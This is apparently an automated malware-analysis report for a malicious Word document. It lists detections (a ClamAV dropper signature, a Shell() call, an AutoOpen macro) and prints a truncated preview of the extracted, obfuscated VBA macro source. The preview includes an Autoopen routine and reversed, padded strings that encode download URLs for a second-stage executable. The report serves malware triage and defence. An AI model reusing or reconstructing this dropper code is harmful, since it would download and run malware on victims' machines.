MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
This Office document contains a critical 'Shell()' call within its VBA macros, indicating an attempt to execute arbitrary code. The presence of an AutoOpen macro further suggests automatic execution upon opening. The ClamAV detection 'Doc.Dropper.Agent-6546844-0' strongly points to this file being a dropper for additional malware, likely downloaded and executed via the VBA script.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6546844-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6546844-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 150920 bytes |
SHA-256: 2a9ec1506926e17508cb6f3d3b003fede65292c32075386e9bf479820d8d0ff3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zTZADLcFXJtFRE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub GuJqoJ(uIvtS)
fWYTPG = NfmOGU
lKuOr = (zhISt / MKOVL / 95319 / Fix(lQzuPm)) + 9692 - CLng(kbHukT + CLng(4429)) + jNjBO + 98203 * NFaHud - CStr(97948) / aQNjq / CLng(QicmVO)
End Sub
Sub BYJoK(iIfwim)
lopfK = mRhiW
LjTjDO = (krMhQS / nTBuUj / 93344 / Fix(zbozb)) + 30534 - CLng(oTumDw + CLng(10735)) + YbhlC + 51901 * GZMaR - CStr(34687) / mJmoo / CLng(ruGmcH)
sndOl = IcSnzu
aUPkBz = (YhkAP / VUiVu / 17946 / Fix(YjTvzp)) + 68463 - CLng(nTVot + CLng(83577)) + WfWli + 94338 * LCdzbM - CStr(77145) / ztozYt / CLng(TmLOA)
NOLVSL = wzIizt
QSwOW = (pWcAt / QULja / 31136 / Fix(uzoSdI)) + 1963 - CLng(zwkJCf + CLng(47063)) + Bnzrfu + 83935 * Kczvdm - CStr(30277) / OBwXcA / CLng(FVfqX)
End Sub
Sub qrnrjK(cYQzFC)
BIFNM = CvBjAJ
SsVAE = (tUkME / cTFpkw / 33776 / Fix(sUwQSd)) + 79918 - CLng(vpGqaI + CLng(57392)) + CQvmIm + 31019 * BTjOwF - CStr(31977) / jjIzvF / CLng(aiDYuF)
STqVn = DfRGE
Pwtbt = (ZZHrAj / ziUIEO / 40786 / Fix(nAQYaS)) + 93344 - CLng(ERCsuq + CLng(69061)) + DJiVjG + 52892 * Jjpli - CStr(44295) / rjKbz / CLng(CTYcvD)
End Sub
Sub Autoopen()
On Error Resume Next
wnuHwn = ujzKh
wOucK = (hDKJkO / EAqJsl / 5329 / Fix(UWmhn)) + 92083 - CLng(TLjzt + CLng(46233)) + nYvRAW + 43627 * dJsLiE - CStr(6989) / GZfYb / CLng(IuXzPk)
musHwkwosI (ZkVOXN + dowlFKYHb + Oalji)
scpbMN = pcaOz
uQAuA = (moDYX / LrlIjo / 97175 / Fix(uAjFwm)) + 3288 - CLng(KzJHO + CLng(37268)) + BNjkZ + 85160 * oDSdBW - CStr(57435) / wmPGJt / CLng(vzOFRi)
End Sub
Sub PPirZ(vzDYBB)
cnSkf = dAWrIJ
RRiVU = (OhoCuJ / tlzjqE / 15825 / Fix(HIidZa)) + 1303 - CLng(sYaiA + CLng(36452)) + QiEamf + 76967 * XbizsD - CStr(76827) / DBrJJ / CLng(suAOb)
dUbwaH = AmiVCT
HCqcI = (EXXjJ / UMqJZ / 47277 / Fix(rHDzm)) + 43266 - CLng(XnOYfp + CLng(79591)) + wpDXFY + 85293 * wumRn - CStr(37047) / cEwwc / CLng(DDEGY)
RIwBUU = QAGBSf
BGFzFz = (cmTiq / WtmzR / 64639 / Fix(bzwtSw)) + 9583 - CLng(KWCdS + CLng(55894)) + wwEBa + 52647 * WiSdHL - CStr(43980) / GklmX / CLng(ILhIs)
End Sub
Sub SQQFY(HwnuQG)
mbTbo = tjvPSs
FLomXs = (aWGNNF / DaaMU / 58582 / Fix(lcoks)) + 36527 - CLng(UWAwMr + CLng(59451)) + IBWXYr + 30228 * FOjSp - CStr(11483) / DzOMT / CLng(ACfZjF)
End Sub
Attribute VB_Name = "FPAOsHRZpzGcVH"
Sub VIAJOC(BwfLOI)
qwplPP = NVahnv
AIjza = (hWYZq / HNCjjs / 18890 / Fix(zwQqFr)) + 83688 - CLng(nabaH + CLng(70764)) + qvNnq + 33935 * ZPvSI - CStr(55930) / mtpiU / CLng(Brsri)
End Sub
Function dowlFKYHb()
On Error Resume Next
ZiwzPq = NMnTF
JfZBv = (jOwBhm / mWzwDV / 9332 / Fix(skaSf)) + 53531 - CLng(PwwZkK + CLng(21676)) + bqwEzL + 54722 * RKTDzO - CStr(26130) / zACQuz / CLng(QLzwzD)
csvhf = QZIMrH
REbSi = (tsimY / KURAv / 58378 / Fix(irUEH)) + 78375 - CLng(LbpUXX + CLng(3634)) + zllLr + 7465 * duGXL - CStr(39646) / wZNiU / CLng(azAUd)
tMMvPYQ = wQpJm("t.mU9+mU9u.oc.yelmU9+mU9admU9+mU9htimU9+mU9emU9+mU9kmU9+mU9//mU9+mU9:mU9+mU9ptmU9+mUW3mZ", 19335 + 5 - 19335, 19335 + 82 - 19335)
wSCNOA = BUjPj
SfOZzj = (SwdQGp / ciCkQ / 66436 / Fix(Hkajs)) + 43061 - CLng(TuRKiv + CLng(4753)) + MXCkzX + 231 * mHZwrS - CStr(34467) / wAmLvn / CLng(FNmzBL)
HsMznz = LKiaZZ
lhupXA = (bLzFvh / YwOzvi / 67115 / Fix(lmVnV)) + 79349 - CLng(ZufjfW + CLng(25988)) + lSDEfj + 29026 * sPkmLT - CStr(55580) / rDjvIT / CLng(iwAlCa)
LshKN = wQpJm(".EMZQ9tm'+'U9+mU9cmU9+mU9udm'+'U9+mU9omU9+mU9rp/emU9+mU9gamU9+mU9mmU9+mU9i/'+'wt.moc.smU9+mU9o'+'mU9+mU9tmU9+mU9ada", 11928 + 2 - 11928, 11928 + 109 - 11928)
BTLEd = riDVWs
XlCQGR = (scnSl / iZHfv / 24714 / Fix(jNQbG)) + 80302 - CLng(mMANYP + CLng(82968)) + tujfk + 46983 * ZjsTM - CStr(93894) / WXZJY / CLng(JUbKQT)
jBihNL = oaCbzN
wVTSGI = (PFHVrL / HJhvsO / 18327 / Fix(GwRUlT)) + 38864 - CLng(bOZZs + CLng(14552)) + XkRCR + 92432 * LWzDh - CStr(32905) / fEwpA / CLng(VAmWL)
cwAkETD = wQpJm("w0mU9;)CDSAxmU9+m'+'U91 ,mU9+mU9)(pmU9+mU9e9mU9+
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.